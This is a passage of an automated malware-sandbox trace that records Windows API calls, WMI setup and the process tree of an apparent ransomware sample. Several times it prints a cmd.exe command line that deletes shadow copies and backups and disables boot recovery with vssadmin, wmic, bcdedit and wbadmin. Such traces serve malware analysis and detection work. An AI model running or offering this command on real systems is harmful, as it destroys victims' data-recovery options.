[0165.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x8b4e990, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmi\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 24 [0165.128] GetProcAddress (hModule=0x6e2a0000, lpProcName="ExecNotificationQueryWmi") returned 0x6e2a70f0 [0165.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x8b4e99c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 14 [0165.133] GetProcAddress (hModule=0x6e2a0000, lpProcName="PutInstanceWmi") returned 0x6e2a77c0 [0165.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x8b4e99c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0165.174] GetProcAddress (hModule=0x6e2a0000, lpProcName="PutClassWmi") returned 0x6e2a76f0 [0165.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x8b4e990, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObject\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 24 [0165.177] GetProcAddress (hModule=0x6e2a0000, lpProcName="CloneEnumWbemClassObject") returned 0x6e2a6c40 [0165.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x8b4e998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmi\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 16 [0165.188] GetProcAddress (hModule=0x6e2a0000, lpProcName="ConnectServerWmi") returned 0x6e2a6d40 [0165.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetErrorInfo", cchWideChar=12, lpMultiByteStr=0x8b4e99c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetErrorInfo\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 12 [0165.223] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetErrorInfo") returned 0x6e2a7330 [0165.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Initialize", cchWideChar=10, lpMultiByteStr=0x8b4e9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Initialize|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 10 [0165.235] GetProcAddress (hModule=0x6e2a0000, lpProcName="Initialize") returned 0x6e2a75e0 [0165.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x8b4e950 | out: phkResult=0x8b4e950*=0x270) returned 0x0 [0165.295] RegQueryValueExW (in: hKey=0x270, lpValueName="WMIDisableCOMSecurity", lpReserved=0x0, lpType=0x8b4e96c, lpData=0x0, lpcbData=0x8b4e968*=0x0 | out: lpType=0x8b4e96c*=0x0, lpData=0x0, lpcbData=0x8b4e968*=0x0) returned 0x2 [0165.295] RegCloseKey (hKey=0x270) returned 0x0 [0165.296] CoCreateInstance (in: rclsid=0x6e2a36ac*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6e2a370c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8b4f0c0 | out: ppv=0x8b4f0c0*=0x7aeb7d0) returned 0x0 [0165.296] WbemLocator:IWbemLocator:ConnectServer (in: This=0x7aeb7d0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8b4f164 | out: ppNamespace=0x8b4f164*=0x75e1478) returned 0x0 [0167.935] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4efe8 | out: ppvObject=0x8b4efe8*=0x76c7f60) returned 0x0 [0167.935] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x76c7f60, pProxy=0x75e1478, pAuthnSvc=0x8b4f038, pAuthzSvc=0x8b4f034, pServerPrincName=0x8b4f02c, pAuthnLevel=0x8b4f030, pImpLevel=0x8b4f020, pAuthInfo=0x8b4f024, pCapabilites=0x8b4f028 | out: pAuthnSvc=0x8b4f038*=0xa, pAuthzSvc=0x8b4f034*=0x0, pServerPrincName=0x8b4f02c, pAuthnLevel=0x8b4f030*=0x6, pImpLevel=0x8b4f020*=0x2, pAuthInfo=0x8b4f024, pCapabilites=0x8b4f028*=0x1) returned 0x0 [0167.935] WbemLocator:IUnknown:Release (This=0x76c7f60) returned 0x1 [0167.935] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x6e2a351c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4efdc | out: ppvObject=0x8b4efdc*=0x76c7f84) returned 0x0 [0167.935] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4efc8 | out: ppvObject=0x8b4efc8*=0x76c7f60) returned 0x0 [0167.935] WbemLocator:IClientSecurity:SetBlanket (This=0x76c7f60, pProxy=0x75e1478, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0167.936] WbemLocator:IUnknown:Release (This=0x76c7f60) returned 0x2 [0167.936] WbemLocator:IUnknown:Release (This=0x76c7f84) returned 0x1 [0167.936] CoTaskMemFree (pv=0x76d6910) [0167.936] WbemLocator:IUnknown:AddRef (This=0x75e1478) returned 0x2 [0167.936] WbemLocator:IUnknown:Release (This=0x7aeb7d0) returned 0x0 [0167.937] CoGetContextToken (in: pToken=0x8b4e508 | out: pToken=0x8b4e508) returned 0x0 [0167.937] CoGetContextToken (in: pToken=0x8b4e910 | out: pToken=0x8b4e910) returned 0x0 [0167.937] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4e8a8 | out: ppvObject=0x8b4e8a8*=0x76c7f68) returned 0x0 [0167.937] WbemLocator:IRpcOptions:Query (in: This=0x76c7f68, pPrx=0x7b11ff0, dwProperty=2, pdwValue=0x8b4e9a8 | out: pdwValue=0x8b4e9a8) returned 0x80004002 [0167.938] WbemLocator:IUnknown:Release (This=0x76c7f68) returned 0x2 [0167.938] CoGetContextToken (in: pToken=0x8b4eee8 | out: pToken=0x8b4eee8) returned 0x0 [0167.938] CoGetContextToken (in: pToken=0x8b4ee48 | out: pToken=0x8b4ee48) returned 0x0 [0167.938] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x8b4ef18*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8b4ede0 | out: ppvObject=0x8b4ede0*=0x75e1478) returned 0x0 [0167.938] WbemLocator:IUnknown:Release (This=0x75e1478) returned 0x2 [0167.939] SysStringLen (param_1=0x0) returned 0x0 [0167.939] CoUninitialize () Thread: id = 260 os_tid = 0x1308 [0168.005] CoGetContextToken (in: pToken=0x8bcef2c | out: pToken=0x8bcef2c) returned 0x0 [0168.005] CoGetContextToken (in: pToken=0x8bcef1c | out: pToken=0x8bcef1c) returned 0x0 [0168.007] CoGetMarshalSizeMax (in: pulSize=0x8bceed8, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x7b11ff0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x8bceed8) returned 0x0 [0168.011] CoMarshalInterface (pStm=0x763bc90, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x7b11ff0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0168.014] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x132d984*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8bced64 | out: ppvObject=0x8bced64*=0x75e1478) returned 0x0 [0168.015] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x6b2f4cd4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8bcec9c | out: ppvObject=0x8bcec9c*=0x75e1478) returned 0x0 [0168.015] WbemLocator:IUnknown:QueryInterface (in: This=0x75e1478, riid=0x6b2f4cd4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8bcec18 | out: ppvObject=0x8bcec18*=0x75e1478) returned 0x0 Thread: id = 263 os_tid = 0x1304 Thread: id = 265 os_tid = 0xf5c Thread: id = 275 os_tid = 0xef0 Thread: id = 286 os_tid = 0xe2c Thread: id = 288 os_tid = 0xe1c Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1d9ec000" os_pid = "0xcf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xff0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0xd20 Thread: id = 42 os_tid = 0x12d0 Thread: id = 47 os_tid = 0x60 Thread: id = 51 os_tid = 0xdb8 Thread: id = 54 os_tid = 0xa7c Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1e454000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1344" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0x97c [0103.135] GetModuleHandleA (lpModuleName=0x0) returned 0xf90000 [0103.135] __set_app_type (_Type=0x1) [0103.135] __p__fmode () returned 0x776f3c14 [0103.135] __p__commode () returned 0x776f49ec [0103.136] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfa6fd0) returned 0x0 [0103.136] __getmainargs (in: _Argc=0xfbd1a4, _Argv=0xfbd1a8, _Env=0xfbd1ac, _DoWildCard=0, _StartInfo=0xfbd1b8 | out: _Argc=0xfbd1a4, _Argv=0xfbd1a8, _Env=0xfbd1ac) returned 0 [0103.136] _onexit (_Func=0xfa8030) returned 0xfa8030 [0103.136] _onexit (_Func=0xfa8040) returned 0xfa8040 [0103.136] _onexit (_Func=0xfa8050) returned 0xfa8050 [0103.136] _onexit (_Func=0xfa8060) returned 0xfa8060 [0103.136] _onexit (_Func=0xfa8070) returned 0xfa8070 [0103.138] _onexit (_Func=0xfa8080) returned 0xfa8080 [0103.138] GetCurrentThreadId () returned 0x97c [0103.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x97c) returned 0xbc [0103.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0103.140] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0103.140] SetThreadUILanguage (LangId=0x0) returned 0xdc0409 [0103.329] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.329] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xb9fdac | out: phkResult=0xb9fdac*=0x0) returned 0x2 [0103.330] VirtualQuery (in: lpAddress=0xb9fdb7, lpBuffer=0xb9fd64, dwLength=0x1c | out: lpBuffer=0xb9fd64*(BaseAddress=0xb9f000, AllocationBase=0xaa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.330] VirtualQuery (in: lpAddress=0xaa0000, lpBuffer=0xb9fd64, dwLength=0x1c | out: lpBuffer=0xb9fd64*(BaseAddress=0xaa0000, AllocationBase=0xaa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0103.330] VirtualQuery (in: lpAddress=0xaa1000, lpBuffer=0xb9fd64, dwLength=0x1c | out: lpBuffer=0xb9fd64*(BaseAddress=0xaa1000, AllocationBase=0xaa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0103.330] VirtualQuery (in: lpAddress=0xaa3000, lpBuffer=0xb9fd64, dwLength=0x1c | out: lpBuffer=0xb9fd64*(BaseAddress=0xaa3000, AllocationBase=0xaa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.330] VirtualQuery (in: lpAddress=0xba0000, lpBuffer=0xb9fd64, dwLength=0x1c | out: lpBuffer=0xb9fd64*(BaseAddress=0xba0000, AllocationBase=0xba0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0103.330] GetConsoleOutputCP () returned 0x1b5 [0103.571] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0103.571] SetConsoleCtrlHandler (HandlerRoutine=0xfb7260, Add=1) returned 1 [0103.571] _get_osfhandle (_FileHandle=1) returned 0x90 [0103.571] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc388c | out: lpMode=0xfc388c) returned 1 [0103.830] _get_osfhandle (_FileHandle=0) returned 0x8c [0103.830] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3888 | out: lpMode=0xfc3888) returned 1 [0104.007] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.007] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0104.204] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.204] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc3890 | out: lpMode=0xfc3890) returned 1 [0104.382] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.382] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0104.589] _get_osfhandle (_FileHandle=0) returned 0x8c [0104.589] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3894 | out: lpMode=0xfc3894) returned 1 [0104.782] _get_osfhandle (_FileHandle=0) returned 0x8c [0104.782] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0104.977] GetEnvironmentStringsW () returned 0x104fe8* [0104.977] GetProcessHeap () returned 0x100000 [0104.977] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xaca) returned 0x105ac0 [0104.977] FreeEnvironmentStringsA (penv="A") returned 1 [0104.977] GetProcessHeap () returned 0x100000 [0104.977] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x4) returned 0x1048c8 [0104.978] GetEnvironmentStringsW () returned 0x104fe8* [0104.978] GetProcessHeap () returned 0x100000 [0104.978] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xaca) returned 0x106598 [0104.978] FreeEnvironmentStringsA (penv="A") returned 1 [0104.978] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb9ed08 | out: phkResult=0xb9ed08*=0xcc) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x98, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x1, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x1, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x0, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x40, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x40, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x40, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.978] RegCloseKey (hKey=0xcc) returned 0x0 [0104.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb9ed08 | out: phkResult=0xb9ed08*=0xcc) returned 0x0 [0104.978] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x40, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x1, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x1, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x0, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x9, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x4, lpData=0xb9ed14*=0x9, lpcbData=0xb9ed0c*=0x4) returned 0x0 [0104.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb9ed10, lpData=0xb9ed14, lpcbData=0xb9ed0c*=0x1000 | out: lpType=0xb9ed10*=0x0, lpData=0xb9ed14*=0x9, lpcbData=0xb9ed0c*=0x1000) returned 0x2 [0104.979] RegCloseKey (hKey=0xcc) returned 0x0 [0104.979] time (in: timer=0x0 | out: timer=0x0) returned 0x5e6f3b9e [0104.979] srand (_Seed=0x5e6f3b9e) [0104.979] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup" [0104.979] malloc (_Size=0x4000) returned 0x3321f0 [0104.979] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup" [0104.980] malloc (_Size=0xffce) returned 0x200048 [0104.980] ??_V@YAXPAX@Z () returned 0xb9fcec [0104.980] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x200048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.981] malloc (_Size=0xffce) returned 0x210020 [0104.982] ??_V@YAXPAX@Z () returned 0xb9fac0 [0104.982] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x210020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0104.982] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0104.982] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.982] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.982] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0104.982] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0104.982] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0104.982] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0104.982] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0104.983] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0104.983] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0104.983] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0104.983] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0104.983] GetProcessHeap () returned 0x100000 [0104.983] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x105ac0) returned 1 [0104.983] GetEnvironmentStringsW () returned 0x104fe8* [0104.983] GetProcessHeap () returned 0x100000 [0104.983] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xae2) returned 0x107b60 [0104.983] FreeEnvironmentStringsA (penv="A") returned 1 [0104.983] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0104.983] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.983] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0104.983] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0104.983] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0104.983] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0104.983] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0104.983] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0104.983] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0104.983] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0104.983] malloc (_Size=0xffce) returned 0x21fff8 [0104.984] ??_V@YAXPAX@Z () returned 0xb9f858 [0104.984] GetProcessHeap () returned 0x100000 [0104.984] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x38) returned 0x1048f0 [0104.984] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x21fff8, lpFilePart=0xb9f8a4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f8a4*="Desktop") returned 0x17 [0104.985] GetFileAttributesW 